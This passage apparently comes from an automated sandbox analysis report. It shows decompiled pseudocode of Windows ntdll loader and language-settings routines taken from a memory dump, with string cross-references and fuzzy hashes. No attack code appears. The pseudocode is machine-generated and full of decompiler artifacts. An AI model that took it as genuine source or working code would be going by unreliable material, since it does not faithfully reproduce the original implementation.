                                        				if(_t280 == 0) {
                                        					_t161 = 0;
                                        					_t280 = 0xc0000017;
                                        					_v40 = 0;
                                        					goto L48;
                                        				} else {
                                        					E053DF3E0(_t280, _v8, _t214);
                                        					_t285 = _t285 + 0xc;
                                        					_v48 = _t280;
                                        					_t283 = E053E1370(_t280, 0x5374e90);
                                        					_pop(_t267);
                                        					if(_t283 != 0) {
                                        						_t245 = _v48;
                                        						do {
                                        							 *_t283 = 0;
                                        							_t284 = _t283 + 2;
                                        							E053DBB40(_t267,  &_v68, _t245);
                                        							if(L053A43C0( &_v68,  &_v24) != 0) {
                                        								_t275 = _t275 + 1;
                                        							}
                                        							_t245 = _t284;
                                        							_t283 = E053E1370(_t284, 0x5374e90);
                                        							_pop(_t267);
                                        						} while (_t283 != 0);
                                        						_v48 = _t245;
                                        						_t242 = _v52;
                                        					}
                                        					_t224 = _v48;
                                        					_t280 = 0;
                                        					if( *_v48 != 0) {
                                        						E053DBB40(_t267,  &_v68, _t224);
                                        						if(L053A43C0( &_v68,  &_v24) != 0) {
                                        							_t275 = _t275 + 1;
                                        						}
                                        					}
                                        					if(_t275 == 0) {
                                        						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                        						_v40 = _t280;
                                        						_v20 = _t280;
                                        					}
                                        					_t225 = _v8;
                                        					if(_v8 != 0) {
                                        						L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                        					}
                                        					_v8 = _t280;
                                        					goto L16;
                                        				}
                                        			}










































                                        0x053f8282
                                        0x053f8282
                                        0x053f8289
                                        0x053f8290
                                        0x053f8293
                                        0x053f8294
                                        0x053f8298
                                        0x053f829b
                                        0x053f829b
                                        0x053a3e35
                                        0x053a3e38
                                        0x053a3e3d
                                        0x053a3e44
                                        0x053a3e58
                                        0x053f82a3
                                        0x053f82a3
                                        0x053a3e58
                                        0x053a3e60
                                        0x053a3e6f
                                        0x053a3e74
                                        0x053a3e77
                                        0x053a3e77
                                        0x053a3e7a
                                        0x053a3e7f
                                        0x053a3e8c
                                        0x053a3e8c
                                        0x053a3e91
                                        0x00000000
                                        0x053a3e91

                                        Strings
                                        • Kernel-MUI-Language-Allowed, xrefs: 053A3DC0
                                        • Kernel-MUI-Language-SKU, xrefs: 053A3F70
                                        • Kernel-MUI-Number-Allowed, xrefs: 053A3D8C
                                        • WindowsExcludedProcs, xrefs: 053A3D6F
                                        • Kernel-MUI-Language-Disallowed, xrefs: 053A3E97
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                        • API String ID: 0-258546922
                                        • Opcode ID: b5aad47090da7db514d144cab96f476b2294f179e631b90b8217f772ffd552e1
                                        • Instruction ID: 5ab8870750dbe0ff4a9baa46a869410285524df64f1f7ef51566a503fb124de4
                                        • Opcode Fuzzy Hash: b5aad47090da7db514d144cab96f476b2294f179e631b90b8217f772ffd552e1
                                        • Instruction Fuzzy Hash: 17F14A72E00618EBCF15DF98C984EEEFBB9FF48650F15406AE505A7650D7B4AE01CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                        			E053C8E00(void* __ecx) {
                                        				signed int _v8;
                                        				char _v12;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr* _t32;
                                        				intOrPtr _t35;
                                        				intOrPtr _t43;
                                        				void* _t46;
                                        				intOrPtr _t47;
                                        				void* _t48;
                                        				signed int _t49;
                                        				void* _t50;
                                        				intOrPtr* _t51;
                                        				signed int _t52;
                                        				void* _t53;
                                        				intOrPtr _t55;
                                        
                                        				_v8 =  *0x548d360 ^ _t52;
                                        				_t49 = 0;
                                        				_t48 = __ecx;
                                        				_t55 =  *0x5488464; // 0x74b10110
                                        				if(_t55 == 0) {
                                        					L9:
                                        					if( !_t49 >= 0) {
                                        						if(( *0x5485780 & 0x00000003) != 0) {
                                        							E05415510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                        						}
                                        						if(( *0x5485780 & 0x00000010) != 0) {
                                        							asm("int3");
                                        						}
                                        					}
                                        					return E053DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                        				}
                                        				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                        				_t43 =  *0x5487984; // 0x32f2ac8
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                        					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                        					if(_t48 == _t43) {
                                        						_t50 = 0x5c;
                                        						if( *_t32 == _t50) {
                                        							_t46 = 0x3f;
                                        							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                        								_t32 = _t32 + 8;
                                        							}
                                        						}
                                        					}
                                        					_t51 =  *0x5488464; // 0x74b10110
                                        					 *0x548b1e0(_t47, _t32,  &_v12);
                                        					_t49 =  *_t51();
                                        					if(_t49 >= 0) {
                                        						L8:
                                        						_t35 = _v12;
                                        						if(_t35 != 0) {
                                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                        								E053C9B10( *((intOrPtr*)(_t48 + 0x48)));
                                        								_t35 = _v12;
                                        							}
                                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                        						}
                                        						goto L9;
                                        					}
                                        					if(_t49 != 0xc000008a) {
                                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                        							if(_t49 != 0xc00000bb) {
                                        								goto L8;
                                        							}
                                        						}
                                        					}
                                        					if(( *0x5485780 & 0x00000005) != 0) {
                                        						_push(_t49);
                                        						E05415510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                        						_t53 = _t53 + 0x1c;
                                        					}
                                        					_t49 = 0;
                                        					goto L8;
                                        				} else {
                                        					goto L9;
                                        				}
                                        			}





















                                        Strings
                                        • minkernel\ntdll\ldrsnap.c, xrefs: 0540933B, 05409367
                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 05409357
                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0540932A
                                        • LdrpFindDllActivationContext, xrefs: 05409331, 0540935D
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                        • API String ID: 0-3779518884
                                        • Opcode ID: 3e524ac791e4649ffc3cb573ba30184b244f36acda95742b413343adeef9ea2f
                                        • Instruction ID: 6e02d60bce5dff1a09db983af09f438529f1ffd5f44ecd59414171ce411b0d97
                                        • Opcode Fuzzy Hash: 3e524ac791e4649ffc3cb573ba30184b244f36acda95742b413343adeef9ea2f
                                        • Instruction Fuzzy Hash: 9A416E32E00319AFDB35AA788889EB9FF76B742644F0545EEE80557191EBF06E80C781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 83%
                                        			E053A8794(void* __ecx) {
                                        				signed int _v0;
                                        				char _v8;
                                        				signed int _v12;
                                        				void* _v16;
                                        				signed int _v20;
                                        				intOrPtr _v24;
                                        				signed int _v28;
                                        				signed int _v32;
                                        				signed int _v40;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr* _t77;
                                        				signed int _t80;
                                        				signed char _t81;
                                        				signed int _t87;
                                        				signed int _t91;
                                        				void* _t92;
                                        				void* _t94;
                                        				signed int _t95;
                                        				signed int _t103;
                                        				signed int _t105;
                                        				signed int _t110;
                                        				signed int _t118;
                                        				intOrPtr* _t121;
                                        				intOrPtr _t122;
                                        				signed int _t125;
                                        				signed int _t129;
                                        				signed int _t131;
                                        				signed int _t134;
                                        				signed int _t136;
                                        				signed int _t143;
                                        				signed int* _t147;
                                        				signed int _t151;
                                        				void* _t153;
                                        				signed int* _t157;
                                        				signed int _t159;
                                        				signed int _t161;
                                        				signed int _t166;
                                        				signed int _t168;
                                        
                                        				_push(__ecx);
                                        				_t153 = __ecx;
                                        				_t159 = 0;
                                        				_t121 = __ecx + 0x3c;
                                        				if( *_t121 == 0) {
                                        					L2:
                                        					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                        					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                        						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                        						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                        						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                        							L6:
                                        							if(E053A934A() != 0) {
                                        								_t159 = E0541A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                        								__eflags = _t159;
                                        								if(_t159 < 0) {
                                        									_t81 =  *0x5485780; // 0x0
                                        									__eflags = _t81 & 0x00000003;
                                        									if((_t81 & 0x00000003) != 0) {
                                        										_push(_t159);
                                        										E05415510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                        										_t81 =  *0x5485780; // 0x0
                                        									}
                                        									__eflags = _t81 & 0x00000010;
                                        									if((_t81 & 0x00000010) != 0) {
                                        										asm("int3");
                                        									}
                                        								}
                                        							}
                                        						} else {
                                        							_t159 = E053A849B(0, _t122, _t153, _t159, _t180);
                                        							if(_t159 >= 0) {
                                        								goto L6;
                                        							}
                                        						}
                                        						_t80 = _t159;
                                        						goto L8;
                                        					} else {
                                        						_t125 = 0x13;
                                        						asm("int 0x29");
                                        						_push(0);
                                        						_push(_t159);
                                        						_t161 = _t125;
                                        						_t87 =  *( *[fs:0x30] + 0x1e8);
                                        						_t143 = 0;
                                        						_v40 = _t161;
                                        						_t118 = 0;
                                        						_push(_t153);
                                        						__eflags = _t87;
                                        						if(_t87 != 0) {
                                        							_t118 = _t87 + 0x5d8;
                                        							__eflags = _t118;
                                        							if(_t118 == 0) {
                                        								L46:
                                        								_t118 = 0;
                                        							} else {
                                        								__eflags =  *(_t118 + 0x30);
                                        								if( *(_t118 + 0x30) == 0) {
                                        									goto L46;
                                        								}
                                        							}
                                        						}
                                        						_v32 = 0;
                                        						_v28 = 0;
                                        						_v16 = 0;
                                        						_v20 = 0;
                                        						_v12 = 0;
                                        						__eflags = _t118;
                                        						if(_t118 != 0) {
                                        							__eflags = _t161;
                                        							if(_t161 != 0) {
                                        								__eflags =  *(_t118 + 8);
                                        								if( *(_t118 + 8) == 0) {
                                        									L22:
                                        									_t143 = 1;
                                        									__eflags = 1;
                                        								} else {
                                        									_t19 = _t118 + 0x40; // 0x40
                                        									_t156 = _t19;
                                        									E053A8999(_t19,  &_v16);
                                        									__eflags = _v0;
                                        									if(_v0 != 0) {
                                        										__eflags = _v0 - 1;
                                        										if(_v0 != 1) {
                                        											goto L22;
                                        										} else {
                                        											_t128 =  *(_t161 + 0x64);
                                        											__eflags =  *(_t161 + 0x64);
                                        											if( *(_t161 + 0x64) == 0) {
                                        												goto L22;
                                        											} else {
                                        												E053A8999(_t128,  &_v12);
                                        												_t147 = _v12;
                                        												_t91 = 0;
                                        												__eflags = 0;
                                        												_t129 =  *_t147;
                                        												while(1) {
                                        													__eflags =  *((intOrPtr*)(0x5485c60 + _t91 * 8)) - _t129;
                                        													if( *((intOrPtr*)(0x5485c60 + _t91 * 8)) == _t129) {
                                        														break;
                                        													}
                                        													_t91 = _t91 + 1;
                                        													__eflags = _t91 - 5;
                                        													if(_t91 < 5) {
                                        														continue;
                                        													} else {
                                        														_t131 = 0;
                                        														__eflags = 0;
                                        													}
                                        													L37:
                                        													__eflags = _t131;
                                        													if(_t131 != 0) {
                                        														goto L22;
                                        													} else {
                                        														__eflags = _v16 - _t147;
                                        														if(_v16 != _t147) {
                                        															goto L22;
                                        														} else {
                                        															E053B2280(_t92, 0x54886cc);
                                        															_t94 = E05469DFB( &_v20);
                                        															__eflags = _t94 - 1;
                                        															if(_t94 != 1) {
                                        															}
                                        															asm("movsd");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															 *_t118 =  *_t118 + 1;
                                        															asm("adc dword [ebx+0x4], 0x0");
                                        															_t95 = E053C61A0( &_v32);
                                        															__eflags = _t95;
                                        															if(_t95 != 0) {
                                        																__eflags = _v32 | _v28;
                                        																if((_v32 | _v28) != 0) {
                                        																	_t71 = _t118 + 0x40; // 0x3f
                                        																	_t134 = _t71;
                                        																	goto L55;
                                        																}
                                        															}
                                        															goto L30;
                                        														}
                                        													}
                                        													goto L56;
                                        												}
                                        												_t92 = 0x5485c64 + _t91 * 8;
                                        												asm("lock xadd [eax], ecx");
                                        												_t131 = (_t129 | 0xffffffff) - 1;
                                        												goto L37;
                                        											}
                                        										}
                                        										goto L56;
                                        									} else {
                                        										_t143 = E053A8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                        										__eflags = _t143;
                                        										if(_t143 != 0) {
                                        											_t157 = _v12;
                                        											_t103 = 0;
                                        											__eflags = 0;
                                        											_t136 =  &(_t157[1]);
                                        											 *(_t161 + 0x64) = _t136;
                                        											_t151 =  *_t157;
                                        											_v20 = _t136;
                                        											while(1) {
                                        												__eflags =  *((intOrPtr*)(0x5485c60 + _t103 * 8)) - _t151;
                                        												if( *((intOrPtr*)(0x5485c60 + _t103 * 8)) == _t151) {
                                        													break;
                                        												}
                                        												_t103 = _t103 + 1;
                                        												__eflags = _t103 - 5;
                                        												if(_t103 < 5) {
                                        													continue;
                                        												}
                                        												L21:
                                        												_t105 = E053DF380(_t136, 0x5371184, 0x10);
                                        												__eflags = _t105;
                                        												if(_t105 != 0) {
                                        													__eflags =  *_t157 -  *_v16;
                                        													if( *_t157 >=  *_v16) {
                                        														goto L22;
                                        													} else {
                                        														asm("cdq");
                                        														_t166 = _t157[5] & 0x0000ffff;
                                        														_t108 = _t157[5] & 0x0000ffff;
                                        														asm("cdq");
                                        														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                        														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                        														if(__eflags > 0) {
                                        															L29:
                                        															E053B2280(_t108, 0x54886cc);
                                        															 *_t118 =  *_t118 + 1;
                                        															_t42 = _t118 + 0x40; // 0x3f
                                        															_t156 = _t42;
                                        															asm("adc dword [ebx+0x4], 0x0");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															asm("movsd");
                                        															_t110 = E053C61A0( &_v32);
                                        															__eflags = _t110;
                                        															if(_t110 != 0) {
                                        																__eflags = _v32 | _v28;
                                        																if((_v32 | _v28) != 0) {
                                        																	_t134 = _v20;
                                        																	L55:
                                        																	E05469D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                        																}
                                        															}
                                        															L30:
                                        															 *_t118 =  *_t118 + 1;
                                        															asm("adc dword [ebx+0x4], 0x0");
                                        															E053AFFB0(_t118, _t156, 0x54886cc);
                                        															goto L22;
                                        														} else {
                                        															if(__eflags < 0) {
                                        																goto L22;
                                        															} else {
                                        																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                        																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                        																	goto L22;
                                        																} else {
                                        																	goto L29;
                                        																}
                                        															}
                                        														}
                                        													}
                                        													goto L56;
                                        												}
                                        												goto L22;
                                        											}
                                        											asm("lock inc dword [eax]");
                                        											goto L21;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        						return _t143;
                                        					}
                                        				} else {
                                        					_push( &_v8);
                                        					_push( *((intOrPtr*)(__ecx + 0x50)));
                                        					_push(__ecx + 0x40);
                                        					_push(_t121);
                                        					_push(0xffffffff);
                                        					_t80 = E053D9A00();
                                        					_t159 = _t80;
                                        					if(_t159 < 0) {
                                        						L8:
                                        						return _t80;
                                        					} else {
                                        						goto L2;
                                        					}
                                        				}
                                        				L56:
                                        			}

                                        Strings
                                        • minkernel\ntdll\ldrsnap.c, xrefs: 053F9C28
                                        • LdrpDoPostSnapWork, xrefs: 053F9C1E
                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 053F9C18
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                        • API String ID: 0-1948996284
                                        • Opcode ID: a1530e53297f36a19b26c26590843b30ade54aadbb5997ab4234c01407e053ac
                                        • Instruction ID: ee1afc001113690b0296958bf4d32282f3742d98323ccef133b60459348bc83e
                                        • Opcode Fuzzy Hash: a1530e53297f36a19b26c26590843b30ade54aadbb5997ab4234c01407e053ac
                                        • Instruction Fuzzy Hash: BE91E173A04215AFDB19DF59C485ABEB7BAFF44314F14416DE906AB240EBB0ED01CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E053A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				char _v24;
                                        				signed int _t73;
                                        				void* _t77;
                                        				char* _t82;
                                        				char* _t87;
                                        				signed char* _t97;
                                        				signed char _t102;
                                        				intOrPtr _t107;
                                        				signed char* _t108;
                                        				intOrPtr _t112;
                                        				intOrPtr _t124;
                                        				intOrPtr _t125;
                                        				intOrPtr _t126;
                                        
                                        				_t107 = __edx;
                                        				_v12 = __ecx;
                                        				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                        				_t124 = 0;
                                        				_v20 = __edx;
                                        				if(E053ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                        					_t112 = _v8;
                                        				} else {
                                        					_t112 = 0;
                                        					_v8 = 0;
                                        				}
                                        				if(_t112 != 0) {
                                        					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                        						_t124 = 0xc000007b;
                                        						goto L8;
                                        					}
                                        					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                        					 *(_t125 + 0x34) = _t73;
                                        					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                        						goto L3;
                                        					}
                                        					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                        					_t124 = E0539C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                        					if(_t124 < 0) {
                                        						goto L8;
                                        					} else {
                                        						goto L3;
                                        					}
                                        				} else {
                                        					L3:
                                        					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                        						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                        						L8:
                                        						return _t124;
                                        					}
                                        					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                        						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                        							goto L5;
                                        						}
                                        						_t102 =  *0x5485780; // 0x0
                                        						if((_t102 & 0x00000003) != 0) {
                                        							E05415510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                        							_t102 =  *0x5485780; // 0x0
                                        						}
                                        						if((_t102 & 0x00000010) != 0) {
                                        							asm("int3");
                                        						}
                                        						_t124 = 0xc0000428;
                                        						goto L8;
                                        					}
                                        					L5:
                                        					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                        						goto L8;
                                        					}
                                        					_t77 = _a4 - 0x40000003;
                                        					if(_t77 == 0 || _t77 == 0x33) {
                                        						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                        						if(E053B7D50() != 0) {
                                        							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        						} else {
                                        							_t82 = 0x7ffe0384;
                                        						}
                                        						_t108 = 0x7ffe0385;
                                        						if( *_t82 != 0) {
                                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                        								if(E053B7D50() == 0) {
                                        									_t97 = 0x7ffe0385;
                                        								} else {
                                        									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        								}
                                        								if(( *_t97 & 0x00000020) != 0) {
                                        									E05417016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                        								}
                                        							}
                                        						}
                                        						if(_a4 != 0x40000003) {
                                        							L14:
                                        							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                        							if(E053B7D50() != 0) {
                                        								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        							} else {
                                        								_t87 = 0x7ffe0384;
                                        							}
                                        							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                        								if(E053B7D50() != 0) {
                                        									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        								}
                                        								if(( *_t108 & 0x00000020) != 0) {
                                        									E05417016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                        								}
                                        							}
                                        							goto L8;
                                        						} else {
                                        							_v16 = _t125 + 0x24;
                                        							_t124 = E053CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                        							if(_t124 < 0) {
                                        								E0539B1E1(_t124, 0x1490, 0, _v16);
                                        								goto L8;
                                        							}
                                        							goto L14;
                                        						}
                                        					} else {
                                        						goto L8;
                                        					}
                                        				}
                                        			}

                                        Strings
                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 053F9891
                                        • minkernel\ntdll\ldrmap.c, xrefs: 053F98A2
                                        • LdrpCompleteMapModule, xrefs: 053F9898
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                        • API String ID: 0-1676968949
                                        • Opcode ID: 0233e4fde891e981697b4b9249263889177516f50753515f679b25b5509bbe8f
                                        • Instruction ID: 1d3fca399c68683762f41df6a3b374f5b40986505c1303ecb89000ea3837f71b
                                        • Opcode Fuzzy Hash: 0233e4fde891e981697b4b9249263889177516f50753515f679b25b5509bbe8f
                                        • Instruction Fuzzy Hash: DB51F533B047859BE729CB68C988F6A7BE9FB40314F040599E9529B7D2D7B4ED00C791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E0539E620(void* __ecx, short* __edx, short* _a4) {
                                        				char _v16;
                                        				char _v20;
                                        				intOrPtr _v24;
                                        				char* _v28;
                                        				char _v32;
                                        				char _v36;
                                        				char _v44;
                                        				signed int _v48;
                                        				intOrPtr _v52;
                                        				void* _v56;
                                        				void* _v60;
                                        				char _v64;
                                        				void* _v68;
                                        				void* _v76;
                                        				void* _v84;
                                        				signed int _t59;
                                        				signed int _t74;
                                        				signed short* _t75;
                                        				signed int _t76;
                                        				signed short* _t78;
                                        				signed int _t83;
                                        				short* _t93;
                                        				signed short* _t94;
                                        				short* _t96;
                                        				void* _t97;
                                        				signed int _t99;
                                        				void* _t101;
                                        				void* _t102;
                                        
                                        				_t80 = __ecx;
                                        				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                        				_t96 = __edx;
                                        				_v44 = __edx;
                                        				_t78 = 0;
                                        				_v56 = 0;
                                        				if(__ecx == 0 || __edx == 0) {
                                        					L28:
                                        					_t97 = 0xc000000d;
                                        				} else {
                                        					_t93 = _a4;
                                        					if(_t93 == 0) {
                                        						goto L28;
                                        					}
                                        					_t78 = E0539F358(__ecx, 0xac);
                                        					if(_t78 == 0) {
                                        						_t97 = 0xc0000017;
                                        						L6:
                                        						if(_v56 != 0) {
                                        							_push(_v56);
                                        							E053D95D0();
                                        						}
                                        						if(_t78 != 0) {
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                        						}
                                        						return _t97;
                                        					}
                                        					E053DFA60(_t78, 0, 0x158);
                                        					_v48 = _v48 & 0x00000000;
                                        					_t102 = _t101 + 0xc;
                                        					 *_t96 = 0;
                                        					 *_t93 = 0;
                                        					E053DBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                        					_v36 = 0x18;
                                        					_v28 =  &_v44;
                                        					_v64 = 0;
                                        					_push( &_v36);
                                        					_push(0x20019);
                                        					_v32 = 0;
                                        					_push( &_v64);
                                        					_v24 = 0x40;
                                        					_v20 = 0;
                                        					_v16 = 0;
                                        					_t97 = E053D9600();
                                        					if(_t97 < 0) {
                                        						goto L6;
                                        					}
                                        					E053DBB40(0,  &_v36, L"InstallLanguageFallback");
                                        					_push(0);
                                        					_v48 = 4;
                                        					_t97 = L0539F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                        					if(_t97 >= 0) {
                                        						if(_v52 != 1) {
                                        							L17:
                                        							_t97 = 0xc0000001;
                                        							goto L6;
                                        						}
                                        						_t59 =  *_t78 & 0x0000ffff;
                                        						_t94 = _t78;
                                        						_t83 = _t59;
                                        						if(_t59 == 0) {
                                        							L19:
                                        							if(_t83 == 0) {
                                        								L23:
                                        								E053DBB40(_t83, _t102 + 0x24, _t78);
                                        								if(L053A43C0( &_v48,  &_v64) == 0) {
                                        									goto L17;
                                        								}
                                        								_t84 = _v48;
                                        								 *_v48 = _v56;
                                        								if( *_t94 != 0) {
                                        									E053DBB40(_t84, _t102 + 0x24, _t94);
                                        									if(L053A43C0( &_v48,  &_v64) != 0) {
                                        										 *_a4 = _v56;
                                        									} else {
                                        										_t97 = 0xc0000001;
                                        										 *_v48 = 0;
                                        									}
                                        								}
                                        								goto L6;
                                        							}
                                        							_t83 = _t83 & 0x0000ffff;
                                        							while(_t83 == 0x20) {
                                        								_t94 =  &(_t94[1]);
                                        								_t74 =  *_t94 & 0x0000ffff;
                                        								_t83 = _t74;
                                        								if(_t74 != 0) {
                                        									continue;
                                        								}
                                        								goto L23;
                                        							}
                                        							goto L23;
                                        						} else {
                                        							goto L14;
                                        						}
                                        						while(1) {
                                        							L14:
                                        							_t27 =  &(_t94[1]); // 0x2
                                        							_t75 = _t27;
                                        							if(_t83 == 0x2c) {
                                        								break;
                                        							}
                                        							_t94 = _t75;
                                        							_t76 =  *_t94 & 0x0000ffff;
                                        							_t83 = _t76;
                                        							if(_t76 != 0) {
                                        								continue;
                                        							}
                                        							goto L23;
                                        						}
                                        						 *_t94 = 0;
                                        						_t94 = _t75;
                                        						_t83 =  *_t75 & 0x0000ffff;
                                        						goto L19;
                                        					}
                                        				}
                                        			}


                                        Strings
                                        • @, xrefs: 0539E6C0
                                        • InstallLanguageFallback, xrefs: 0539E6DB
                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0539E68C
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                        • API String ID: 0-1757540487
                                        • Opcode ID: e1c25622e4f6f9b6d3a16ccac65e457abd12820172d8796a11a06ebd618df233
                                        • Instruction ID: 3a2e1e4673f5aac4561cb8da5597b33708a0b82752d85892ba982f697c9d4a7a
